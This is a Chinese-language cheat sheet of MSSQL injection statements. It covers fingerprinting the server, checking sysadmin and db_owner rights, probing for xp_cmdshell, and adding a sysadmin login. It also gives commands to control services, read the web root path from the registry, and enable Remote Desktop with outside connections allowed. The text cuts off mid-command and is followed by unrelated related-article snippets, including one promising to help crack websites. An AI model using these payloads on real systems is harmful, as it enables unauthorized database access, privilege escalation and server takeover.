sql注入常用语句
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@servername) //本地服务名 and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员 and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限 and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限 and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3.... ;declare @d int //是否支持多行 and 1=(Select count(*) from master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在 and 1=(select count(*) from master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除 添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin 停掉或激活某个服务。 (需要SA权限)
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule' 暴网站目录
create table labeng(lala nvarchar(255), id int) DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result); and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————分割 DOS下开3389 并修改端口号
sc config termservice start= auto net start termservice //允许外连
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo
相关文档:
如何导入.sql文件到mysql中?
C:\mysql\bin>mysql -u 用户名 -p 数据库名 < c:/test.sql (source "c:\adsense.sql" )
中间的空格是一个空格位。
同时使用200多MB的sql文件。
例如:
C:\Program Files\MySQL\bin>mysql -u root -p myrosz & ......
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。
第一节、利用系统表注入SQLServer数据库
SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发 ......
在做“都市家园”优化时,具体是用户注册时,提交信息,本来Birthday是没有写入值的,此字段也没有默认值,可数据库中却为“1905/3/14 0:00:00”,郁闷至极,上google&baidu也是没有解决的方案。
只能这样原始的解决:
Register 存储过程
insert into UserInfo(UserID,sex) ......
